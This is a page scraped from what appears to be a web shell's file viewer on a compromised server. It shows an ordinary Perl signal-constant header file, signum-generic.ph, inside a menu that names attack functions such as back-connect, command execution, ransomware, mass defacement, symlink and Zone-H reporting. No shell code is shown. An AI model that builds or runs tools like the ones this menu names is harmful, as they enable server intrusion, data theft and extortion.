\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /lib/x86_64-linux-gnu/perl/5.34/bits/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : //lib/x86_64-linux-gnu/perl/5.34/bits/signum-generic.ph |
require '_h2ph_pre.ph';
no warnings qw(redefine misc);
unless(defined(&_BITS_SIGNUM_GENERIC_H)) {
eval 'sub _BITS_SIGNUM_GENERIC_H () {1;}' unless defined(&_BITS_SIGNUM_GENERIC_H);
unless(defined(&_SIGNAL_H)) {
die("Never include <bits/signum-generic.h> directly; use <signal.h> instead.");
}
eval 'sub SIG_ERR () {(( &__sighandler_t) -1);}' unless defined(&SIG_ERR);
eval 'sub SIG_DFL () {(( &__sighandler_t) 0);}' unless defined(&SIG_DFL);
eval 'sub SIG_IGN () {(( &__sighandler_t) 1);}' unless defined(&SIG_IGN);
if(defined(&__USE_XOPEN)) {
eval 'sub SIG_HOLD () {(( &__sighandler_t) 2);}' unless defined(&SIG_HOLD);
}
eval 'sub SIGINT () {2;}' unless defined(&SIGINT);
eval 'sub SIGILL () {4;}' unless defined(&SIGILL);
eval 'sub SIGABRT () {6;}' unless defined(&SIGABRT);
eval 'sub SIGFPE () {8;}' unless defined(&SIGFPE);
eval 'sub SIGSEGV () {11;}' unless defined(&SIGSEGV);
eval 'sub SIGTERM () {15;}' unless defined(&SIGTERM);
eval 'sub SIGHUP () {1;}' unless defined(&SIGHUP);
eval 'sub SIGQUIT () {3;}' unless defined(&SIGQUIT);
eval 'sub SIGTRAP () {5;}' unless defined(&SIGTRAP);
eval 'sub SIGKILL () {9;}' unless defined(&SIGKILL);
eval 'sub SIGPIPE () {13;}' unless defined(&SIGPIPE);
eval 'sub SIGALRM () {14;}' unless defined(&SIGALRM);
eval 'sub SIGIO () { &SIGPOLL;}' unless defined(&SIGIO);
eval 'sub SIGIOT () { &SIGABRT;}' unless defined(&SIGIOT);
eval 'sub SIGCLD () { &SIGCHLD;}' unless defined(&SIGCLD);
require 'bits/signum-arch.ph';
eval 'sub _NSIG () {( &__SIGRTMAX + 1);}' unless defined(&_NSIG);
}
1;